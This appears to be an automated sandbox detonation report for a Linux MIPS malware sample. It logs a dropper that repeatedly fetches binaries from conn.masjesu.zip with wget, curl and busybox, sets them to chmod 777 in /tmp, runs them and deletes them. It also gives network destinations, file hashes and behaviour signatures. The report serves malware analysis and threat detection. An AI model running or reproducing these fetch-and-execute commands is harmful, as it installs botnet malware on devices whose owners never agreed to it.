[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 08:51
Reported
2024-11-21 08:56
Platform
debian9-mipsel-20240729-en
Max time kernel
71s
Max time network
72s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
